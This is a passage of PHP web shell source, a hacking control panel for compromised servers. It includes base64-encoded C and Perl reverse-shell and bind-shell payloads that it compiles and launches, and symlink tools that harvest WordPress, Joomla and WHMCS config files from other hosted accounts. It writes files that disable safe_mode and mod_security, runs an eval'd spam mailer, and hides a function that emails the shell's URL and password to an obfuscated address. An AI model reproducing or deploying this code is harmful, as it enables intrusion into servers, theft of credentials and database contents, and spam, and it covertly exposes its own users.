"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value." (".$n['n'].")
"; } echo "
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); $num = $db->fetch(); $num = $num['n']; echo "".$_POST['p2']." ($num) "; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST['p3']) echo "",($i+1)," "; else echo ($i+1)," "; if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

Load file
"; if(@$_POST['p1'] == 'loadfile') { $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); $file = $db->fetch(); echo '
'.htmlspecialchars($file['file']).'
'; } } echo '
'; printFooter(); } function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off'); $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.' Uname: '.substr(@php_uname(), 0, 120).' Pass: http://www.hashchecker.de/'.$auth_pass.' IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("b3pjYW5sZXNiaWdib3NzQGhvdG1haWwuZnI=");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';} function actionNetwork() { printHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo '

Network tools


Bind port to /bin/sh
Port: Password: Using:


Back-connect to
Server: Port: Using:

'; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$out\n".ex("ps aux | grep bp")."
"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "
$out\n".ex("ps aux | grep bp.pl")."
"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$out\n".ex("ps aux | grep bc")."
"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$out\n".ex("ps aux | grep bc.pl")."
"; } } echo '
'; printFooter(); } function actionPortScanner() { printHeader(); echo '

Port Scanner

'; echo '
'; echo '
'; if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is open
'; } flush(); } } else { echo '

Host:

Port start:

Port end:



'; } echo '
'; printFooter(); } function actionReadable() { printHeader(); echo '

Readable Dirs

'; echo '
'; $sm = ini_get('safe_mode'); if($sm) { echo '
Error: safe_mode = on

'; } else { @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { echo '
[-] Error : coudn`t read /etc/passwd

'; } else { $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '

'; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."
"; echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."


"; foreach ($users as $user) { $path = "/home/$user/public_html/"; echo $path."
"; } echo "


[+] Complete...\n"."
"; } } echo '
'; printFooter(); } function actionSymlink() { printHeader(); echo '

Symlink

'; $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $expld = explode('/',$furl ); $burl =str_replace(end($expld),'',$furl); echo '

[ Domains ] - [ Whole Server Symlink ] - [ Config files symlink ]

'; if(isset($_POST['p1']) && $_POST['p1']=='website') { echo "
"; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ echo "
Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo ""; $unk = array(); foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0]; flush(); } } } $count=1; $unk = array_unique($unk); $l=0; foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d)); echo ""; flush(); $count++; $l=$l?0:1; } echo "
Count Domains Users
".$count."".$d."".$user['name']."
"; } echo ""; } if(isset($_POST['p1']) && $_POST['p1']=='whole') { echo "
"; @mkdir('sym',0777); $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $hfp =@fopen ('sym/.htaccess','w'); fwrite($hfp ,$hdt); if(function_exists('symlink')) { @symlink('/','sym/root'); } $d0mains = @file('/etc/named.conf'); if(!$d0mains) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo ""; $count=1; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $l=0; foreach($mck as $d) { $user = posix_getpwuid(@fileowner('/etc/valiases/'.$d)); $ddt = $user['name']; //@symlink('/','sym/root'); $ddt = $d; if(@eregi("\.ir",$d) or @eregi("\.il",$d)) { $ddt = "
".$d.'
'; } echo ""; flush(); $l=$l?0:1; } echo '
Count Domains User Symlink
".$count++."'.$ddt.' '.$user['name']."symlink
'; } echo ""; } if(isset($_POST['p1']) && $_POST['p1']=='config') { echo "
"; @mkdir('sym',0777); $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $hfp = @fopen ('sym/.htaccess','w'); @fwrite($hfp ,$hdt); if(function_exists('symlink')) { @symlink('/','sym/root'); } $d0mains = @file('/etc/named.conf'); if(!$d0mains) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo ""; $count = 1; $l=0; foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0])); $c1 = $burl.'/sym/root/home/'.$user['name'].'/public_html/wp-config.php'; $ch01 = get_headers($c1); $cf01 = $ch01[0]; $c2 = $burl.'/sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php'; $ch02 = get_headers($c2); $cf02 = $ch02[0]; $c3 = $burl.'/sym/root/home/'.$user['name'].'/public_html/configuration.php'; $ch03 = get_headers($c3); $cf03 = $ch03[0]; $c4 = $burl.'/sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php'; $ch04 = get_headers($c4); $cf04 = $ch04[0]; $c5 = $burl.'/sym/root/home/'.$user['name'].'/public_html/includes/config.php'; $ch05 = get_headers($c5); $cf05 = $ch05[0]; $c6 = $burl.'/sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php'; $ch06 = get_headers($c6); $cf06 = $ch06[0]; $c7 = $burl.'/sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php'; $ch07 = get_headers($c7); $cf07 = $ch07[0]; $c8 = $burl.'/sym/root/home/'.$user['name'].'public_html/clients/configuration.php'; $ch08 = get_headers($c8); $cf08 = $ch08[0]; $c9 = $burl.'/sym/root/home/'.$user['name'].'/public_html/support/configuration.php'; $ch09 = get_headers($c9); $cf09 = $ch09[0]; $c10 = $burl.'/sym/root/home/'.$user['name'].'/public_html/client/configuration.php'; $ch10 = get_headers($c10); $cf10 = $ch10[0]; $c11 = $burl.'/sym/root/home/'.$user['name'].'/public_html/submitticket.php'; $ch11 = get_headers($c11); $cf11 = $ch11[0]; $c12 = $burl.'/sym/root/home/'.$user['name'].'/public_html/client/configuration.php'; $ch12 = get_headers($c12); $cf12 = $ch12[0]; $c13 = $burl.'/sym/root/home/'.$user['name'].'/public_html/includes/configure.php'; $ch13 = get_headers($c13); $cf13 = $ch13[0]; $c14 = $burl.'/sym/root/home/'.$user['name'].'/public_html/include/app_config.php'; $ch14 = get_headers($c14); $cf14 = $ch14[0]; $c15 = $burl.'/sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php'; $ch15 = get_headers($c15); $cf15 = $ch15[0]; $out = ' '; if(strpos($cf01,'200') == true) { $out = "Wordpress"; } elseif(strpos($cf02,'200') == true) { $out = "Wordpress"; } elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " WHMCS"; } elseif(strpos($cf09,'200') == true) { $out = " WHMCS"; } elseif(strpos($cf10,'200') == true) { $out = " WHMCS"; } elseif(strpos($cf03,'200') == true) { $out = " Joomla"; } elseif(strpos($cf04,'200') == true) { $out = " Joomla"; } elseif(strpos($cf05,'200') == true) { $out = " vBulletin"; } elseif(strpos($cf06,'200') == true) { $out = " vBulletin"; } elseif(strpos($cf07,'200') == true) { $out = " vBulletin"; } elseif(strpos($cf08,'200') == true) { $out = " Client Area"; } elseif(strpos($cf12,'200') == true) { $out = " Client Area"; } elseif(strpos($cf13,'200') == true) { $out = " osCommerce/Zen Cart"; } elseif(strpos($cf14,'200') == true) { $out = " Magento"; } elseif(strpos($cf15,'200') == true) { $out = " Drupal"; } else { continue; } echo ''; flush(); $l=$l?0:1; } } } echo "
Count Domains Script
'.$count++.''.$domain[1][0].''.$user['name'].''.$out.'
"; } echo ""; } echo "
"; printFooter(); } function actionBypass() { printHeader(); echo '

Safe Mode

'; echo '
'; echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |

"; echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) |
'; if(!empty($_POST['p2']) && isset($_POST['p2'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fil); } if(!empty($_POST['p1'])&& isset($_POST['p1'])) { $fil=fopen($GLOBALS['cwd']."php.ini","w"); fwrite($fil,'safe_mode=OFF disable_functions=NONE'); fclose($fil); } if(!empty($_POST['p3']) && isset($_POST['p3'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl'); fclose($fil); } echo "


"; echo '
'; printFooter(); } function actionGetUser(){ printHeader(); echo '

Get User

'; eval(base64_decode('JGkgPSAwOw0Kd2hpbGUgKCRpIDwgNjAwMDApIHsNCgkkbGluZSA9IHBvc2l4X2dldHB3dWlkKCRp KTsNCglpZiAoIWVtcHR5KCRsaW5lKSkgew0KCQl3aGlsZSAobGlzdCAoJGtleSwgJHZsKSA9IGVh Y2goJGxpbmUpKXsNCgkJCWVjaG8gIiR2bDwvYnI+IjsNCgkJCWJyZWFrOw0KCQl9DQoJfQ0KIAkk aSsrOw0KfQ==')); printFooter(); } function actionMailer(){ printHeader(); echo '

Mailer

'; eval(base64_decode('Ly9Eb250IGNoYW5nZSBhbnl0aGluZyBmcm9tIGJlbG93CiRzZWN1cmUgPSAiIjsKZXJyb3JfcmVwb3J0aW5nKDApOwpAJGFjdGlvbj0kX1BPU1RbJ2FjdGlvbiddOwpAJGZyb209JF9QT1NUWydmcm9tJ107CkAkcmVhbG5hbWU9JF9QT1NUWydyZWFsbmFtZSddOwpAJHJlcGx5dG89JF9QT1NUWydyZXBseXRvJ107CkAkc3ViamVjdD0kX1BPU1RbJ3N1YmplY3QnXTsKQCRtZXNzYWdlPSRfUE9TVFsnbWVzc2FnZSddOwpAJGVtYWlsbGlzdD0kX1BPU1RbJ2VtYWlsbGlzdCddOwpAJGZpbGVfbmFtZT0kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsKQCRjb250ZW50dHlwZT0kX1BPU1RbJ2NvbnRlbnR0eXBlJ107CkAkZmlsZT0kX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ107CkAkYW1vdW50PSRfUE9TVFsnYW1vdW50J107CnNldF90aW1lX2xpbWl0KGludHZhbCgkX1BPU1RbJ3RpbWVsaW1pdCddKSk7Cj8+CjwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iCiAgICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+ILBbTWFpTGVyIEJZIFRoZSBHZW4hdXNdsCA8L3RpdGxlPgo8cCBhbGlnbj0iY2VudGVyIj4KPHRpdGxlPiCwW01haUxlciBCWSBUaGUgR2VuIXVzXbAgPC90aXRsZT4KPC9wPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTYiPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgo8IS0tCi5zdHlsZTEgewoJZm9udC1mYW1pbHk6IEdlbmV2YSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsKCWZvbnQtc2l6ZTogMTJweDsKfQouc3R5bGUyIHsKCWZvbnQtc2l6ZTogMTBweDsKCWZvbnQtZmFtaWx5OiBHZW5ldmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7Cn0KCi0tPgo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5IGJnY29sb3I9IiNGNUY1RjUiIHRleHQ9IiMwMDAwMDAiPgoKPD9waHAKSWYgKCRhY3Rpb249PSJteXNxbCIpewovL0dyYWIgZW1haWwgYWRkcmVzc2VzIGZyb20gTXlTUUwKaW5jbHVkZSAiLi9teXNxbC5pbmZvLnBocCI7CgogIGlmICghJHNxbGhvc3QgfHwgISRzcWxsb2dpbiB8fCAhJHNxbHBhc3MgfHwgISRzcWxkYiB8fCAhJHNxbHF1ZXJ5KXsKICAgIHByaW50ICJQbGVhc2UgY29uZmlndXJlIG15c3FsLmluZm8ucGhwIHdpdGggeW91ciBNeVNRTCBpbmZvcm1hdGlvbi4gQWxsIHNldHRpbmdzIGluIHRoaXMgY29uZmlnIGZpbGUgYXJlIHJlcXVpcmVkLiI7CiAgICBleGl0OwogIH0KCiAgJGRiID0gbXlzcWxfY29ubmVjdCgkc3FsaG9zdCwgJHNxbGxvZ2luLCAkc3FscGFzcykgb3IgZGllKCJDb25uZWN0aW9uIHRvIE15U1FMIEZhaWxlZC4iKTsKICBteXNxbF9zZWxlY3RfZGIoJHNxbGRiLCAkZGIpIG9yIGRpZSgiQ291bGQgbm90IHNlbGVjdCBkYXRhYmFzZSAkc3FsZGIiKTsKICAkcmVzdWx0ID0gbXlzcWxfcXVlcnkoJHNxbHF1ZXJ5KSBvciBkaWUoIlF1ZXJ5IEZhaWxlZDogJHNxbHF1ZXJ5Iik7CiAgJG51bXJvd3MgPSBteXNxbF9udW1fcm93cygkcmVzdWx0KTsKCiAgZm9yKCR4PTA7ICR4PCRudW1yb3dzOyAkeCsrKXsKICAgICRyZXN1bHRfcm93ID0gbXlzcWxfZmV0Y2hfcm93KCRyZXN1bHQpOwogICAgICRvbmVlbWFpbCA9ICRyZXN1bHRfcm93WzBdOwogICAgICRlbWFpbGxpc3QgLj0gJG9uZWVtYWlsLiJcbiI7CiAgIH0KICB9CgogIGlmICgkYWN0aW9uPT0ic2VuZCIpeyAkbWVzc2FnZSA9IHVybGVuY29kZSgkbWVzc2FnZSk7CiAgICRtZXNzYWdlID0gZXJlZ19yZXBsYWNlKCIlNUMlMjIiLCAiJTIyIiwgJG1lc3NhZ2UpOwogICAkbWVzc2FnZSA9IHVybGRlY29kZSgkbWVzc2FnZSk7CiAgICRtZXNzYWdlID0gc3RyaXBzbGFzaGVzKCRtZXNzYWdlKTsKICAgJHN1YmplY3QgPSBzdHJpcHNsYXNoZXMoJHN1YmplY3QpOwogICB9Cj8+Cjxmb3JtIG5hbWU9ImZvcm0xIiBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj48YnIgLz4KICA8dGFibGUgd2lkdGg9IjE0MiIgYm9yZGVyPSIwIj4KICAgIDx0cj4KCiAgICAgIDx0ZCB3aWR0aD0iODEiPgogICAgICAgIDxkaXYgYWxpZ249InJpZ2h0Ij4KICAgICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5Zb3VyIEVtYWlsOjwvZm9udD4KICAgICAgICA8L2Rpdj4KICAgICAgPC90ZD4KCiAgICAgIDx0ZCB3aWR0aD0iMjE5Ij4KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+CiAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZnJvbSIgdmFsdWU9Ijw/cGhwIHByaW50ICRmcm9tOyA/PiIgc2l6ZT0iMzAiIC8+CiAgICAgICAgPC9mb250PgogICAgICA8L3RkPgoKICAgICAgPHRkIHdpZHRoPSIyMTIiPgogICAgICAgIDxkaXYgYWxpZ249InJpZ2h0Ij4KICAgICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5Zb3VyIE5hbWU6PC9mb250PgogICAgICAgIDwvZGl2PgogICAgICA8L3RkPgoKICAgICAgPHRkIHdpZHRoPSIyNzgiPgogICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4KICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJyZWFsbmFtZSIgdmFsdWU9Ijw/cGhwIHByaW50ICRyZWFsbmFtZTsgPz4iIHNpemU9IjMwIiAvPgogICAgICAgIDwvZm9udD4KICAgICAgPC90ZD4KICAgIDwvdHI+CiAgICA8dHI+CiAgICAgIDx0ZCB3aWR0aD0iODEiPgogICAgICAgIDxkaXYgYWxpZ249InJpZ2h0Ij4KICAgICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5SZXBseS1Ubzo8L2ZvbnQ+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvdGQ+CiAgICAgIDx0ZCB3aWR0aD0iMjE5Ij4KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+CiAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icmVwbHl0byIgdmFsdWU9Ijw/cGhwIHByaW50ICRyZXBseXRvOyA/PiIgc2l6ZT0iMzAiIC8+CiAgICAgICAgPC9mb250PgogICAgICA8L3RkPgogICAgICA8dGQgd2lkdGg9IjIxMiI+CiAgICAgICAgPGRpdiBhbGlnbj0icmlnaHQiPgogICAgICAgICAgPGZvbnQgc2l6ZT0iLTMiIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPkF0dGFjaCBGaWxlOjwvZm9udD4KICAgICAgICA8L2Rpdj4KICAgICAgPC90ZD4KICAgICAgPHRkIHdpZHRoPSIyNzgiPgogICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4KICAgICAgICAgIDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSIyNCIgLz4KICAgICAgICA8L2ZvbnQ+CiAgICAgIDwvdGQ+CiAgICA8L3RyPgogICAgPHRyPgogICAgICA8dGQgd2lkdGg9IjgxIj4KICAgICAgICA8ZGl2IGFsaWduPSJyaWdodCI+CiAgICAgICAgICA8Zm9udCBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+U3ViamVjdDo8L2ZvbnQ+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvdGQ+CiAgICAgIDx0ZCBjb2xzcGFuPSIzIiB3aWR0aD0iNzAzIj4KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+CiAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ic3ViamVjdCIgdmFsdWU9Ijw/IHByaW50ICRzdWJqZWN0OyA/PiIgc2l6ZT0iOTAiIC8+CiAgICAgICAgPC9mb250PgogICAgICA8L3RkPgogICAgPC90cj4KICAgIDx0ciB2YWxpZ249InRvcCI+CiAgICAgIDx0ZCBjb2xzcGFuPSIzIiB3aWR0aD0iNTIwIj4KICAgICAgICA8Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSItMyI+TWVzc2FnZSBCb3ggOjwvZm9udD4KICAgICAgPC90ZD4KICAgICAgPHRkIHdpZHRoPSIyNzgiPgogICAgICAgIDxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9Ii0zIj5FbWFpbCBUYXJnZXQgLyBFbWFpbCBTZW5kIF